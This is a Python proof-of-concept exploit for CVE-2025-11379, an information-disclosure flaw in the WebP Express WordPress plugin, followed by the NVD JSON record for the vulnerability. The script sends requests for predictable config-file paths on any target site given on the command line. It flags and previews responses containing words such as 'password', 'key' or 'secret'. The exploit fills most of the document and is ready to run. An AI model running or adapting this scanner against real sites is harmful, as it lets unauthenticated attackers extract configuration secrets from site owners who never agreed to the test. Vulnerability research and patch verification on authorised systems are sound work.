CVE-2025-11379

# CVE-2025-11379 PoC - WebP Express Config File Information Disclosure # Affected: WebP Express plugin for WordPress <= 0.25.9 # Type: Information Disclosure via predictable config file paths import requests import sys from urllib.parse import urljoin def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-11379 Tests common config file paths for WebP Express plugin """ # Common config file paths used by WebP Express config_paths = [ '/wp-content/webp-express/config/files/.htaccess', '/wp-content/webp-express/config/log.txt', '/wp-content/webp-express/config/options.json', '/wp-content/webp-express/config/wpc-settings.json', '/wp-content/webp-express/log.txt' ] vulnerable_paths = [] for path in config_paths: full_url = urljoin(target_url, path) try: response = requests.get(full_url, timeout=10, verify=False) if response.status_code == 200 and len(response.content) > 0: # Check if response contains sensitive config data content = response.text.lower() if any(keyword in content for keyword in ['password', 'key', 'secret', 'db_', 'api']): vulnerable_paths.append({ 'path': path, 'status': 'VULNERABLE - Contains sensitive data', 'content_preview': response.text[:200] }) elif response.status_code == 200: vulnerable_paths.append({ 'path': path, 'status': 'Accessible (verify content)', 'content_preview': response.text[:200] }) except requests.RequestException as e: print(f"Error checking {path}: {e}") return vulnerable_paths def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-11379-poc.py <target_url>") print("Example: python cve-2025-11379-poc.py http://example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Scanning target: {target}") print(f"[*] Checking for CVE-2025-11379 vulnerability...\n") results = check_vulnerability(target) if results: print(f"[!] Found {len(results)} accessible config paths:\n") for result in results: print(f"Path: {result['path']}") print(f"Status: {result['status']}") print(f"Preview: {result['content_preview'][:100]}...") print("-" * 50) else: print("[*] No vulnerable config paths found or target not affected") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-11379", "sourceIdentifier": "[email protected]", "published": "2025-12-04T05:16:19.720", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WebP Express plugin for WordPress is vulnerable to information exposure via config files in all versions up to, and including, 0.25.9. This is due to the plugin not properly randomizing the name of the config file to prevent direct access on NGINX. This makes it possible for unauthenticated attackers to extract configuration data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3425653%40webp-express&new=3425653%40webp-express&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/webp-express/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c28479bf-768a-4ab4-8e74-ad367b9b744f?source=cve", "source": "[email protected]"}]}}